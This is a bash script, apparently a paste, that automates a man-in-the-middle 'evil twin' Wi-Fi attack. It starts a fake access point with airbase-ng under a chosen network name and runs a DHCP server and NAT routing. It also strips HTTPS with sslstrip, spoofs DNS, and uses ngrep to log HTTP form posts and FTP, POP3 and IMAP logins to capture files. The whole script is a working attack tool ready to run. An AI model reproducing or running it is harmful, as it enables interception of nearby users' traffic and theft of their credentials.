Untitled

#!/bin/bash

###########################################################################################################
#---------------------------- Configuration Stuff --------------------------------------------------------#
###########################################################################################################
ESSID=linksys # default value... can be changed at runtime with -e <ssid>
MON=mon0
CHAN=6
INT=eth1
GATEWAY=`/sbin/ip route | awk '/default/ { print $3 }' | head -1`

# Strip SSL? Modify arguments or comment out to disable
SSLSTRIP="python /pentest/web/sslstrip/sslstrip.py "
SSTRIPARGS="-f -a -w /tmp/sslstrip"
#---------------------------------

IPSTART=10.0.0.16
IPEND=10.0.0.55
ROUTER=10.0.0.1
SUBNET=10.0.0.0
BROADCAST=10.0.0.0
NETMASK=255.255.255.0
DNS=10.0.0.1

DHCP="authoritative;\n\
ddns-update-style ad-hoc;\n\
subnet $SUBNET netmask $NETMASK {\n\
	allow unknown-clients;\n\
	default-lease-time 600;\n\
	max-lease-time 7200;\n\
	option subnet-mask $NETMASK;\n\
	option broadcast-address $BROADCAST;\n\
	option routers $ROUTER;\n\
	option domain-name-servers $DNS;\n\
	range dynamic-bootp $IPSTART $IPEND;\n\
}"
# Password Logging
HTTPLOG=/tmp/http.pcap
FTPLOG=/tmp/ftp.pcap
POP3LOG=/tmp/pop3.pcap
IMAPLOG=/tmp/imap.pcap

#--------------------------- END OF CONFIGURATION ----------------------------
##-- Handle Arguments
if [ $1 = "-e" ]
then
ESSID=$2
fi
###########################################################################################################
#----------------------------- Splash Screen -------------------------------------------------------------#
###########################################################################################################
echo -e "\033[31;4m                                                                   \033[0m"
echo -e "\033[31;4m*******************************************************************\033[0m"
echo -e "\033[29;1m		              _ __          \033[0m"
echo -e "\033[29;1m		   ____ ___  (_) /_____ ___ \033[0m"
echo -e "\033[29;1m		  / __ \`__ \/ / __/ __ \`__ \ \033[0m"
echo -e "\033[29;1m		 / / / / / / / /_/ / / / / /\033[0m"
echo -e "\033[29;1m		/_/ /_/ /_/_/\__/_/ /_/ /_/ \033[0m"
echo -e "\033[29;1m	   ___                         ______     _       _           \033[0m"
echo -e "\033[29;1m	  / _ \                        | ___ \   (_)     | |          \033[0m"
echo -e "\033[29;1m	 / /_\ \ ___ ___ ___  ___ ___  | |_/ /__  _ _ __ | |_         \033[0m"
echo -e "\033[29;1m	 |  _  |/ __/ __/ _ \/ __/ __| |  __/ _ \| | '_ \| __|        \033[0m"
echo -e "\033[29;1m	 | | | | (_| (_|  __/\__ \__ \ | | | (_) | | | | | |_         \033[0m"
echo -e "\033[29;1m	 \_| |_/\___\___\___||___/___/ \_|  \___/|_|_| |_|\__|        \033[0m"

echo -e "\033[31;1m                                                                   \033[0m"
echo -e "   \033[31;4mCurrent Configuration:\033[0m"
echo -e "\033[31;1m   	ESSID: \033[34;1m$ESSID\033[31;1m  Channel:\033[34;1m$CHAN\033[31;1m                     \033[0m"
echo -e "\033[31;1m   	Bridged Interface: \033[34;1m$INT\033[31;1m                          \033[0m"
echo -e "\033[31;1m   	Default Gateway: \033[34;1m$GATEWAY\033[31;1m                        \033[0m"
echo -e "\033[31;1m   	DHCP Range: \033[34;1m$IPSTART\033[31;1m - \033[34;1m$IPEND\033[31;1m                    \033[0m"
echo -e "\033[31;1m   	Soft-Router IP: \033[34;1m$ROUTER\033[31;1m                          \033[0m"
echo -e "\033[31;1m   	Subnet: \033[34;1m$SUBNET\033[31;1m Broadcast: \033[34;1m$BROADCAST\033[31;1m            \033[0m"
echo -e "\033[31;1m   	Netmask: \033[34;1m$NETMASK DNS: \033[34;1m$DNS\033[31;1m                     \033[0m"

if [ -n "${SSLSTRIP+x}" ]
then
echo -e "\033[31;1m   	Strip SSL: \033[34;1mYes\033[31;1m Args: \033[34;1m$SSTRIPARGS\033[31;1m                     \033[0m"
else
echo -e "\033[31;1m   	Strip SSL: \033[34;1mNo                     \033[0m"
fi

echo ""
echo -e "\033[29;1m   !!!!! Confirm wifi card is in monitor mode at $MON !!!!!!   \033[0m"
echo -e "\033[31;1m                          CTRL-C to Cancel                    \033[0m"
echo -e "\033[32;1m                       Press Enter to continue...              \033[0m"
echo -e "\033[31;4m                                                                  \033[0m"
echo -e "\033[31;4m******************************************************************\033[0m"
read

###########################################################################################################
#------------------------------ Running Commands ---------------------------------------------------------#
###########################################################################################################
echo -e "\033[32;1mStarting fake accesspoint with ESSID $ESSID\033[0m"
#gnome-terminal -e "airbase-ng -c $CHAN -e $ESSID $MON"
gnome-terminal -e "airbase-ng -w 01234ABCD0 -c $CHAN -e $ESSID $MON"
sleep 5
echo -e "\033[32;1mConfiguring Tap Interface at0\033[0m"
ifconfig at0 up
ifconfig at0 $ROUTER netmask $NETMASK
ifconfig at0 mtu 1400
echo -e "\033[32;1mSetting up forwarding and routing\033[0m"
route add -net $SUBNET netmask $NETMASK gw $ROUTER
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o $INT -j MASQUERADE
iptables -A FORWARD -i at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.200.2
echo -e "\033[32;1mStarting DHCP Server on at0\033[0m"
mv /etc/dhcp3/dhcpd.conf /etc/dhcpd.conf.old
echo -e  $DHCP > /etc/dhcp3/dhcpd.conf
killall dhcpd3 &> /dev/null
gnome-terminal -e "dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0"
if [ -n "${SSLSTRIP+x}" ]
then
echo -e "\033[32;1mStarting SSL Strip\033[0m"
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
$SSLSTRIP$SSTRIPARGS &> /dev/null &
echo -e "\033[32;1mStarting DNS Spoofing on at0\033[0m"
/usr/local/sbin/dnsspoof -i at0 &> /dev/null &
fi
echo -e "\033[32;1mLogging packet captures containing credentials\033[0m"
ngrep -O $HTTPLOG -d at0 -i '^(GET|POST)' tcp port 80 > /dev/null&
ngrep -O $FTPLOG -d at0 -i '^(USER|PASS)' tcp port 21 > /dev/null&
ngrep -O $IMAPLOG -d at0 -i '^(a login )' tcp port 143 > /dev/null&
ngrep -O $POP3LOG -d at0 -i '^(USER|PASS)' tcp port 110 > /dev/null&
###########################################################################################################
#---------------------------------------Cleanup Stuff-----------------------------------------------------#
###########################################################################################################
echo -e "\033[31;1m*******************************************************************\033[0m"
echo -e "\033[31;1m               Press Enter to Gracefully Exit\033[0m"
echo -e "\033[31;1m*******************************************************************\033[0m"
read
killall ngrep > /dev/null
killall airbase-ng
killall dhcpd3
if [ -n "${SSLSTRIP+x}" ]
then
	kill $(ps aux | grep -m 1 "python /pentest/web/sslstrip/sslstrip.py" | awk '{print $2}') #kill sslstrip
	killall dnsspoof #kill dnsspoof
fi
# Reset networking stuff
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 0 > /proc/sys/net/ipv4/ip_forward